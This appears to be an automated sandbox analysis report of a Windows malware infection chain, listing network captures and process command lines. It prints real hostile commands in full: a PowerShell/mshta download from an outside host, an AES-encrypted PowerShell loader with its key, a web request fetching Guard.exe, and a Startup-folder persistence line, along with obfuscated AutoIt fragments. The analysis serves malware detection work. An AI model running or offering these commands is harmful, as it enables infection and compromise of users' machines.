                                                                    Dec 18, 2024 09:13:20.553338051 CET1236INData Raw: 28 22 37 36 5d 38 31 5d 37 35 5d 37 37 5d 35 35 5d 38 38 5d 38 37 5d 39 31 5d 39 32 5d 35 35 5d 39 30 5d 37 38 5d 37 35 5d 35 35 5d 39 31 5d 38 38 5d 39 30 5d 38 31 5d 38 36 5d 37 39 5d 35 35 22 2c 38 2f 31 29 29 0a 44 72 69 76 65 53 74 61 74 75
                                                                    Data Ascii: ("76]81]75]77]55]88]87]91]92]55]90]78]75]55]91]88]90]81]86]79]55",8/1))DriveStatus(Wales("83]112]119]54",14/2))$InterestedDieDocs = $InterestedDieDocs + 1EndIfIf $InterestedDieDocs = 28 Then$InnovationImaginationLipAfrican = ATan(7544)Ex
                                                                    Dec 18, 2024 09:13:20.553353071 CET1236INData Raw: 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 38 36 5d 37 33 5d 38 31 5d 37 36 5d 37 34 5d 39 31 5d 39 30 5d 33 39 5d 39 31 5d 38 39 5d 37 32 5d 39 33 5d 37 36 5d 38 33 5d 33 39 5d 37 35 5d 37 36 5d 37 34 5d 33 39 22 2c 37 2f 31 29 29 0a 46
                                                                    Data Ascii: iveStatus(Wales("86]73]81]76]74]91]90]39]91]89]72]93]76]83]39]75]76]74]39",7/1))FileExists(Wales("88]73]90]92]91]40]79]81]90]84]91]40]75]80]77]75]83]77]76]40",8/1))$ActressGoneLicense = $ActressGoneLicense + 1EndIfIf $ActressGoneLicense =
                                                                    Dec 18, 2024 09:13:20.553580999 CET1236INData Raw: 31 30 30 5d 37 38 5d 37 31 5d 39 35 5d 31 30 30 5d 39 30 5d 38 33 5d 38 36 5d 31 30 30 22 2c 31 38 2f 33 29 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 37 30 2c 20 39 34 30 2c 20 30 29 0a 24 49 6c 6c 6e 65 73 73 46 6f 6c 6b 20 3d 20 24 49 6c
                                                                    Data Ascii: 100]78]71]95]100]90]83]86]100",18/3))PixelGetColor(70, 940, 0)$IllnessFolk = $IllnessFolk + 1EndIfIf $IllnessFolk = 8 ThenOpt(Wales("92]122]105]129]81]107]119]118]80]113]108]109",24/3), 1)ExitLoopEndIfIf $IllnessFolk = 9 ThenDriveStat
                                                                    Dec 18, 2024 09:13:20.553659916 CET1236INData Raw: 31 5d 39 34 5d 39 31 5d 39 31 5d 38 32 5d 37 36 5d 37 34 5d 38 37 5d 37 38 5d 35 31 5d 37 36 5d 38 38 5d 39 36 5d 35 31 22 2c 39 2f 31 29 2c 20 57 61 6c 65 73 28 22 38 37 5d 37 38 5d 37 36 5d 37 38 5d 39 32 5d 39 32 5d 37 34 5d 39 31 5d 38 32 5d
                                                                    Data Ascii: 1]94]91]91]82]76]74]87]78]51]76]88]96]51",9/1), Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]91]91]82]76]74]87]78]51]76]88]96]51",9/1))ACos(8143)$StartsEquityIncurredLayout = $StartsEquityIncurredLayout + 1EndIfIf $StartsEq
                                                                    Dec 18, 2024 09:13:20.672879934 CET1236INData Raw: 31 5d 37 39 5d 37 39 5d 37 37 5d 39 31 5d 39 32 5d 36 39 5d 39 35 5d 37 37 5d 37 34 5d 39 31 5d 39 32 5d 37 37 5d 39 30 5d 36 39 22 2c 37 32 2f 39 29 29 0a 41 54 61 6e 28 32 35 32 35 29 0a 24 52 45 43 4f 4d 4d 45 4e 44 45 44 44 4f 43 55 4d 45 4e
                                                                    Data Ascii: 1]79]79]77]91]92]69]95]77]74]91]92]77]90]69",72/9))ATan(2525)$RECOMMENDEDDOCUMENTED = $RECOMMENDEDDOCUMENTED + 1EndIfIf $RECOMMENDEDDOCUMENTED = 56 Then$VacanciesLauderdaleBirminghamLands = 28$dominantrepresentedboothplastics = 51For $x


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549704147.45.49.1554435060C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-18 08:13:00 UTC328OUTGET /ghep2 HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-CH
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: tiffany-careers.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-18 08:13:00 UTC396INHTTP/1.1 200 OK
                                                                    etag: "13122-675ebf3f-2534f;;;"
                                                                    last-modified: Sun, 15 Dec 2024 11:36:31 GMT
                                                                    content-length: 78114
                                                                    accept-ranges: bytes
                                                                    date: Wed, 18 Dec 2024 08:13:00 GMT
                                                                    server: LiteSpeed
                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                    connection: close
                                                                    2024-12-18 08:13:01 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 13 b2 ed 95 57 d3 83 c6 57 d3 83 c6 57 d3 83 c6 43 b8 86 c7 56 d3 83 c6 43 b8 80 c7 55 d3 83 c6 43 b8 87 c7 43 d3 83 c6 43 b8 82 c7 50 d3 83 c6 57 d3 82 c6 73 d3 83 c6 43 b8 8a c7 56 d3 83 c6 43 b8 7c c6 56 d3 83 c6 43 b8 81 c7 56 d3 83 c6 52 69 63 68 57 d3 83 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 9e 30 35 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WWWCVCUCCCPWsCVC|VCVRichWPELC05
                                                                    2024-12-18 08:13:01 UTC16384INData Raw: 32 2e 64 6c 6c 00 00 6f 00 5f 58 63 70 74 46 69 6c 74 65 72 00 c9 00 5f 5f 70 5f 5f 63 6f 6d 6d 6f 64 65 00 00 11 01 5f 61 6d 73 67 5f 65 78 69 74 00 00 a1 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 e2 00 5f 5f 73 65 74 5f 61 70 70 5f 74 79 70 65 00 00 ae 04 65 78 69 74 00 00 73 01 5f 65 78 69 74 00 24 01 5f 63 65 78 69 74 00 00 ce 00 5f 5f 70 5f 5f 66 6d 6f 64 65 00 00 07 02 5f 69 73 6d 62 62 6c 65 61 64 00 00 e4 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 00 e8 01 5f 69 6e 69 74 74 65 72 6d 00 f7 00 5f 61 63 6d 64 6c 6e 00 35 00 3f 74 65 72 6d 69 6e 61 74 65 40 40 59 41 58 58 5a 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 37 01 5f 63 6f 6e 74 72 6f 6c 66 70 00 00 6a 01 5f 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 7f 05
                                                                    Data Ascii: 2.dllo_XcptFilter__p__commode_amsg_exit__getmainargs__set_app_typeexits_exit$_cexit__p__fmode_ismbblead__setusermatherr_initterm_acmdln5?terminate@@YAXXZmsvcrt.dll7_controlfpj_except_handler4_common
                                                                    2024-12-18 08:13:01 UTC16384INData Raw: 2c 75 42 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 72 45 2c 6b 4a 2c 75 42 2c 75 50 2c 77 46 2c 6b 4a 2c 75 42 2c 75 42 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 72 45 2c 6b 4a 2c 75 42 2c 75 50 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 45 4b 2c 6b 4a 2c 75 42 2c 6d 52 2c 41 52 2c 6b 4a 2c 75 42 2c 75 50 2c 75 42 2c 6b 4a 2c 75 42 2c 75 50 2c 72 45 2c 6b 4a 2c 75 42 2c 75 50 2c 6d 52 2c 6b 4a 2c 75 42 2c 75 50 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 70 76 2c 6b 4a 2c 75 42 2c 75 42 2c 41 52 2c 6b 4a 2c 75 42 2c 6d 52 2c 41 52 2c 6b 4a 2c 75 42 2c 6d 52 2c 45 4b 2c 6b 4a 2c 75 42 2c 75 42 2c 70 76 2c 6b 4a 2c 75 42 2c 6d 52 2c 45 4b 2c 6b 4a 2c 75 42 2c 75 50 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 6d 52 2c 6b 4a 2c 75 42 2c 75 42 2c 72 45 2c 6b 4a 2c 75 42 2c 75 50
                                                                    Data Ascii: ,uB,pv,kJ,uB,uP,rE,kJ,uB,uP,wF,kJ,uB,uB,pv,kJ,uB,uP,rE,kJ,uB,uP,pv,kJ,uB,uP,EK,kJ,uB,mR,AR,kJ,uB,uP,uB,kJ,uB,uP,rE,kJ,uB,uP,mR,kJ,uB,uP,pv,kJ,uB,uP,pv,kJ,uB,uB,AR,kJ,uB,mR,AR,kJ,uB,mR,EK,kJ,uB,uB,pv,kJ,uB,mR,EK,kJ,uB,uP,pv,kJ,uB,uP,mR,kJ,uB,uB,rE,kJ,uB,uP
                                                                    2024-12-18 08:13:01 UTC16384INData Raw: 75 50 2c 6b 4a 2c 75 42 2c 75 50 2c 72 45 2c 6b 4a 2c 75 42 2c 75 50 2c 6d 52 2c 6b 4a 2c 75 42 2c 75 42 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 77 46 2c 6b 4a 2c 75 42 2c 75 50 2c 70 76 2c 6b 4a 2c 75 42 2c 75 50 2c 75 42 2c 6b 4a 2c 75 42 2c 75 50 2c 6d 52 2c 6b 4a 2c 75 42 2c 75 50 2c 75 42 2c 6b 4a 2c 75 42 2c 75 42 2c 41 52 2c 6b 4a 2c 75 42 2c 75 50 2c 79 46 2c 6b 4a 2c 75 42 2c 75 50 2c 75 42 2c 6b 4a 2c 75 42 2c 75 50 2c 45 4b 2c 6b 4a 2c 75 42 2c 6d 52 2c 45 4b 2c 6b 4a 2c 75 42 2c 6d 52 2c 41 52 2c 6b 4a 2c 75 42 2c 75 50 2c 45 4b 2c 6b 4a 2c 75 42 2c 75 42 2c 41 52 2c 6b 4a 2c 75 42 2c 75 50 2c 79 46 2c 6b 4a 2c 75 42 2c 75 50 2c 75 50 2c 6b 4a 2c 75 42 2c 6d 52 2c 41 52 2c 6b 4a 2c 75 42 2c 75 50 2c 72 45 2c 6b 4a 2c 75 42 2c 6d 52 2c 41 52 2c
                                                                    Data Ascii: uP,kJ,uB,uP,rE,kJ,uB,uP,mR,kJ,uB,uB,pv,kJ,uB,uP,wF,kJ,uB,uP,pv,kJ,uB,uP,uB,kJ,uB,uP,mR,kJ,uB,uP,uB,kJ,uB,uB,AR,kJ,uB,uP,yF,kJ,uB,uP,uB,kJ,uB,uP,EK,kJ,uB,mR,EK,kJ,uB,mR,AR,kJ,uB,uP,EK,kJ,uB,uB,AR,kJ,uB,uP,yF,kJ,uB,uP,uP,kJ,uB,mR,AR,kJ,uB,uP,rE,kJ,uB,mR,AR,
                                                                    2024-12-18 08:13:01 UTC12578INData Raw: 77 77 77 ba 7e ee 77 77 00 00 00 00 00 88 78 f7 f7 77 7b ba 7e e7 77 77 70 00 00 0f ff ff ff 8f 7f 7f ff ff ee 7f ff ff ff 00 00 0f ff ff ff ff f7 ff ff ff e7 7f ff ff ff f0 00 00 00 00 0f ff 8f 00 00 0f f7 00 00 00 0f ff 00 00 00 00 00 0f f8 00 00 0f ff 00 00 00 00 0f f0 00 00 ff 00 0f f7 00 00 00 ff 70 00 ff 00 0f f0 00 00 0f 00 00 ff 00 00 00 0f f0 00 0f 00 00 f0 00 00 0f f0 00 ff 00 00 00 0f f0 00 0f f0 00 f0 00 00 0f f0 00 07 00 00 f0 00 ff 00 0f f0 00 f0 00 00 00 00 00 07 00 00 f0 00 0f 00 00 00 00 00 00 00 00 00 00 7a 00 00 77 00 0f 00 00 00 00 00 00 00 00 00 07 aa 00 00 77 70 00 f0 00 00 00 00 00 00 08 e7 7a aa ee bb 77 77 7f 7f 78 00 00 00 00 00 08 77 aa ae ee bb 77 77 77 f7 f7 00 00 00 00 00 00 8a aa ae ee bb 77 77 77 7f 70 00 00 00 00 00 00 08
                                                                    Data Ascii: www~wwxw{~wwppzwwpzwwxwwwwwwwp


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7b6e20000
                                                                    File size:52'224 bytes
                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:12:54
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:03:12:56
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2
                                                                    Imagebase:0x7ff7c7810000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:03:13:00
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:03:13:01
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.Substring(0,3) $mGnVsuDWp.Substring(3)
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:03:13:01
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:03:13:03
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
                                                                    Imagebase:0x7ff686a00000
                                                                    File size:5'641'176 bytes
                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:03:13:04
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                    Imagebase:0x7ff6413e0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:03:13:04
                                                                    Start date:18/12/2024
                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                    Imagebase:0x7ff6413e0000
                                                                    File size:3'581'912 bytes
                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                    Imagebase:0x7ff7c0e50000
                                                                    File size:1'083'904 bytes
                                                                    MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 32%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:03:13:07
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:03:13:15
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:03:13:15
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:03:13:21
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\Public\Guard.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                    Imagebase:0x6b0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Has exited:false

                                                                    Target ID:21
                                                                    Start time:03:13:23
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                    Imagebase:0x790000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:03:13:23
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:03:13:32
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                    Imagebase:0x7ff69fa90000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:03:13:33
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                    Imagebase:0x290000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Has exited:false

                                                                    Reset < >
                                                                      Memory Dump Source
